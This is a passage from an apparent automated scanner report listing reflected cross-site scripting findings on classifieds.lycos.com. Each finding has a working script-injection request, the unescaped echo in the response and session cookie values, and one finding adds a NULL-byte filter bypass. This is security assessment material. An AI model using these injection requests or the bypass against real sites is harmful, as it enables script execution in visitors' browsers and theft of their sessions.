The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a172"><script>alert(1)</script>25b1903d5f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-pet-sitter/?9a172"><script>alert(1)</script>25b1903d5f4=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:53:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:24 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-pet-sitter/?9a172"><script>alert(1)</script>25b1903d5f4=1&mobile=1" rel="nofollow">
...[SNIP]...

1.204. http://classifieds.lycos.com/service-pet-veterinarian/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-pet-veterinarian/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d0ca"><script>alert(1)</script>968c7855b12 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-pet-veterinarian9d0ca"><script>alert(1)</script>968c7855b12/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:14:03 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:14:03 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-pet-veterinarian9d0ca"><script>alert(1)</script>968c7855b12/?mobile=1" rel="nofollow">
...[SNIP]...

1.205. http://classifieds.lycos.com/service-pet-veterinarian/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-pet-veterinarian/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5d8a"><script>alert(1)</script>5f431f82572 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-pet-veterinarian/?f5d8a"><script>alert(1)</script>5f431f82572=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:13:34 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:13:34 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27163

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-pet-veterinarian/?f5d8a"><script>alert(1)</script>5f431f82572=1&mobile=1" rel="nofollow">
...[SNIP]...

1.206. http://classifieds.lycos.com/service-tech/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-tech/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19db0"><script>alert(1)</script>d7c28e4b076 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-tech19db0"><script>alert(1)</script>d7c28e4b076/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:16:46 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:16:46 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-tech19db0"><script>alert(1)</script>d7c28e4b076/?mobile=1" rel="nofollow">
...[SNIP]...

1.207. http://classifieds.lycos.com/service-tech/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-tech/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21ab1"><script>alert(1)</script>24d279bc44e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-tech/?21ab1"><script>alert(1)</script>24d279bc44e=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:16:09 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:16:09 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37223

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-tech/?21ab1"><script>alert(1)</script>24d279bc44e=1&mobile=1" rel="nofollow">
...[SNIP]...

1.208. http://classifieds.lycos.com/service/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad8a1"><script>alert(1)</script>8e9027af6c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servicead8a1"><script>alert(1)</script>8e9027af6c/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 14:59:59 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:59 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17673

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/servicead8a1"><script>alert(1)</script>8e9027af6c/?mobile=1" rel="nofollow">
...[SNIP]...

1.209. http://classifieds.lycos.com/service/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68c09"><script>alert(1)</script>d95411a21e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service/?68c09"><script>alert(1)</script>d95411a21e3=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:59:27 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:27 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41487

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service/?68c09"><script>alert(1)</script>d95411a21e3=1&mobile=1" rel="nofollow">
...[SNIP]...

1.210. http://classifieds.lycos.com/sitemap/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sitemap/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d46a3"><script>alert(1)</script>52170a0140d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sitemapd46a3"><script>alert(1)</script>52170a0140d/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:19:09 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:19:09 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17676

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sitemapd46a3"><script>alert(1)</script>52170a0140d/?mobile=1" rel="nofollow">
...[SNIP]...

1.211. http://classifieds.lycos.com/sitemap/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sitemap/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ddd3"><script>alert(1)</script>90a1bbc1cb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sitemap/?2ddd3"><script>alert(1)</script>90a1bbc1cb2=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:18:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:18:33 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 96318

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sitemap/?2ddd3"><script>alert(1)</script>90a1bbc1cb2=1&mobile=1" rel="nofollow">
...[SNIP]...

1.212. http://classifieds.lycos.com/vehicle-boat/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-boat/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd873"><script>alert(1)</script>a3b7f789261 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle-boatfd873"><script>alert(1)</script>a3b7f789261/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:14:38 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:14:38 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-boatfd873"><script>alert(1)</script>a3b7f789261/?mobile=1" rel="nofollow">
...[SNIP]...

1.213. http://classifieds.lycos.com/vehicle-boat/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-boat/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f6b7"><script>alert(1)</script>f4fcf37b3ff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle-boat/?6f6b7"><script>alert(1)</script>f4fcf37b3ff=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:14:11 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:14:11 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 68506

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-boat/?6f6b7"><script>alert(1)</script>f4fcf37b3ff=1&mobile=1" rel="nofollow">
...[SNIP]...

1.214. http://classifieds.lycos.com/vehicle-car-convertible/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-car-convertible/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d1fd"><script>alert(1)</script>885ff275591 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle-car-convertible2d1fd"><script>alert(1)</script>885ff275591/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:15:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:15:16 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-car-convertible2d1fd"><script>alert(1)</script>885ff275591/?mobile=1" rel="nofollow">
...[SNIP]...

1.215. http://classifieds.lycos.com/vehicle-car-convertible/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-car-convertible/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c63cc"><script>alert(1)</script>c9c5f17cb02 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle-car-convertible/?c63cc"><script>alert(1)</script>c9c5f17cb02=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:14:42 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:14:42 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 102597

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-car-convertible/?c63cc"><script>alert(1)</script>c9c5f17cb02=1&mobile=1" rel="nofollow">
...[SNIP]...

1.216. http://classifieds.lycos.com/vehicle-car-coupe/2011-honda-accord-24330-00-2416142893 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-car-coupe/2011-honda-accord-24330-00-2416142893

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9749e"><script>alert(1)</script>0dc818c9da5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle-car-coupe9749e"><script>alert(1)</script>0dc818c9da5/2011-honda-accord-24330-00-2416142893 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:00:00 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:00 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17817

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-car-coupe9749e"><script>alert(1)</script>0dc818c9da5/2011-honda-accord-24330-00-2416142893?mobile=1" rel="nofollow">
...[SNIP]...

1.217. http://classifieds.lycos.com/vehicle-car-coupe/2011-honda-accord-24330-00-2416142893 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-car-coupe/2011-honda-accord-24330-00-2416142893

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007b82f"><script>alert(1)</script>db619e10b8c was submitted in the REST URL parameter 2. This input was echoed as 7b82f"><script>alert(1)</script>db619e10b8c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /vehicle-car-coupe/2011-honda-accord-24330-00-2416142893%007b82f"><script>alert(1)</script>db619e10b8c HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:01:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:01:07 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-car-coupe/2011-honda-accord-24330-00-2416142893%007b82f"><script>alert(1)</script>db619e10b8c?mobile=1" rel="nofollow">
...[SNIP]...

1.218. http://classifieds.lycos.com/vehicle-car-coupe/2011-honda-accord-24330-00-2416142893 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
